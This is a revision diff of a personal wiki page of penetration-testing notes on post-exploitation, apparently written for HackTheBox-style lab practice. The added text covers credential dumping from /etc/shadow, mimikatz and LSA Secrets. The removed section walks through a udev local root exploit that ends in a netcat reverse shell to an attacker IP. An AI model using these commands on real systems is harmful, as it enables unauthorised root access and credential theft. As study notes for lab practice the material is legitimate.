The gMan nixWiki

Because the mind is made of Teflon...

User Tools

Site Tools

You are here: start » method_5_post-exploitation
method_5_post-exploitation

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
method_5_post-exploitation [2023/01/12 00:16] gmanmethod_5_post-exploitation [2023/01/12 00:31] (current) – [First Thing] gman
Line 33: Line 33:
     * Concealment     * Concealment
     * Retain Access     * Retain Access
 +
 +----
 +
 +===== First Thing =====
 +
 +After you've compromised a system, one of the //**first things**// you want to try is acquiring the local credential store (passwords).
 +
 +**Windows:** The go-to tool is ''mimikatz'' (it can read hashes directly from memory).
 +
 +**Linux:** The ''creddump'' package contains...
 +  - ''cachedump'': dumps cashed credentials
 +  - ''lsadump'': dumps LSA Secrets
 +  - ''pwdump'': dumps password hashes
 +
 +Linux passwords are usually found in ''/etc/shadow''.
 +  * You can simply copy that file to your attack machine and crack offline (if you have root).
 +  * Therefore, priv esc is a key part of acquiring credentials.
  
 ---- ----
Line 88: Line 105:
   * Check sudo: ''sudo -l'' (if it hangs, it's waiting for a password; kill & reconnect)   * Check sudo: ''sudo -l'' (if it hangs, it's waiting for a password; kill & reconnect)
   * You can also ''find'' backup files (.bak; might have login creds in them) and files owned by root but world readable and/or writable.   * You can also ''find'' backup files (.bak; might have login creds in them) and files owned by root but world readable and/or writable.
- 
----- 
- 
-====== Privilege Escalation ====== 
- 
-===== SUDO ===== 
- 
-''sudo'' is the "super user do" command.  
-  * It allows users to escalate their privileges based on settings in the ''/etc/sudoers'' file. 
-  * When the ''sudo'' command is called, the ''sudoers'' file is checked and rights are granted if they are permitted.  
- 
-Therefore, //**always**// review the ''sudoers'' file after you gain access to a machine. 
-  * Figure out which accounts you want to target based on the rights they have. 
-  * Try to compromise accounts with sudo privilege. 
- 
-One of the first commands you want to execute in order to abuse sudoer rights: ''sudo -l'' 
-  * This will list ("-l" is for "list") the sudoers. 
-  * This shows you the user account names and privileges they have within the sudo environment. 
- 
----- 
- 
-===== SUID ===== 
- 
-**SUID:** Set User ID.  **SGID:** Set Group ID 
-  * These are special bits of a file that tell Linux to run the executable as the owner (SUID) or as the group (SGID) of the file, not as the user who launched it.  
- 
-To find all the files on a system that have the SUID bit set:  
- 
-<code> 
-find / -perm -4000 
-# or 
-find / -perm /4000 
- 
-# To see all the details: 
-find / -perm -u=s -type f 2>/dev/null 
-# or 
-find / -user root -perm -4000 -exec ls -ldb {} \; 
-# note: you need a space between {} and \; 
-</code> 
- 
----- 
- 
-===== udevd ===== 
- 
-If you get a user/daemon shell, you need to escalate your privileges to root. Check udevd... 
- 
-[[https://www.exploit-db.com/search?q=udev|Four local Linux exploits using udevd]] to escalate privileges to root:  
-  - Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation 
-  - Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege Escalation (Metasploit) 
-  - Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Local Privilege Escalation (2) 
-  - Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1) 
- 
-[[https://www.youtube.com/watch?v=DoUZFHwZntY&feature=youtu.be&t=8m40s&ab_channel=rwbnetsec|Walk-Through Video]] described below:  
- 
-On the target machine, see if udev is running:  
- 
-<code>ps ax | grep udevd</code> 
- 
-On the target machine, check the version of udev; run: 
- 
-<code> 
-dkpg -l | grep udev 
-# On HTB Lame I got version 117-8 
-</code> 
- 
-Google the udev version or do a ''searchsploit udev'' and see what comes up. The YouTuber referenced above liked the 8572.c exploit. **Note:** The searchsploit results show a Path that is local in: /usr/share/exploitdb/exploits/... 
- 
-<code> 
--------------------------------------------------------- --------------------------------- 
- Exploit Title                                          |  Path 
--------------------------------------------------------- ---------------------- 
-Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV <  | linux/local/8478.sh 
-Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4 | linux/local/8572.c 
-Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalat | linux/local/41886.c 
-Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege E | linux/local/21848.rb 
--------------------------------------------------------- ---------------------- 
-</code> 
- 
-First, spin up a web server on hour Kali box (your attack machine, your machine) so we can move the exploit over onto the target box:  
- 
-<code>start apache2 service</code> 
- 
-Copy the exploit file over to the web server subdir: 
- 
-<code>cp /usr/share/exploitdb/exploits/linux/local/8572.c /var/www/html/</code> 
- 
-Check & Read:  
-  * cd into ''/var/www/html'' and make sure your file is there. Open it up with an editor and look at what it needs to run. 
-  * The Usage section of the file (at the top, scroll down) will tell you how to use the exploit. 
-    * Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually is the udevd PID minus 1) as argv[1]. 
-    * The exploit will execute ''/tmp/run'' (a text file named "run" that lives in the /tmp directory) as root so throw whatever payload you want in there.   
- 
-From your shell over on the target, in the /tmp directory, copy the file from your Kali attack machine onto the target machine using wget: 
- 
-<code>wget 10.10.14.11/8572  # that's the IP of your Kali/attack machine</code> 
- 
-Build your run file on the target, in the /tmp directory. Remember, the /tmp/run file is being used as the payload for the udev exploit. So... build a text file... 
- 
-<code> 
-touch run 
-echo '#!/bin/sh' >> run 
-echo '/bin/netcat -e /bin/sh 10.10.14.11 5555' >> run 
-</code> 
- 
-When the udev exploit runs, it will execute netcat with the reverse shell going to my attack machine 
- 
-You need to compile that .c file you copied to the target machine:  
- 
-<code>gcc 8572.c -o 8572  # name it whatever you want</code> 
- 
-Set up the listener on your Kali (host/attack) machine to catch the shell we're throwing out from the target: 
- 
-<code>nc -nvlp 5555  # make sure it's the same port number</code> 
- 
-Now the listener is waiting for a connection on the Kali attack machine... 
- 
-Run the udev exploit on the target using the netlink socket PID as argv[1]. This creates a reverse shell back to your Kali attack machine. 
- 
-<code>./8572 2687</code> 
- 
-You should have a reverse shell on your Kali machine with root privileges on the target machine. Done. 
  
 ---- ----
Line 337: Line 233:
 ===== Windoze ===== ===== Windoze =====
  
 +==== LSA Secrets Registry ====
 +
 +The **LSA Secrets Registry** contains the password of the currently logged-in user in an encrypted form.
 +  * You can find the LSA Secrets Registry here: ''HKEY_LOCAL_MACHINE/Security/Policy/Secrets''
 +  * You can find the encryption key to the user's password in the parent directory: ''HKEY_LOCAL_MACHINE/Security/Policy''
  
 +So, if you have admin access to the Windows Registry, you can recover the encrypted password and its key fairly easily. 
method_5_post-exploitation.1673482581.txt.gz · Last modified: by gman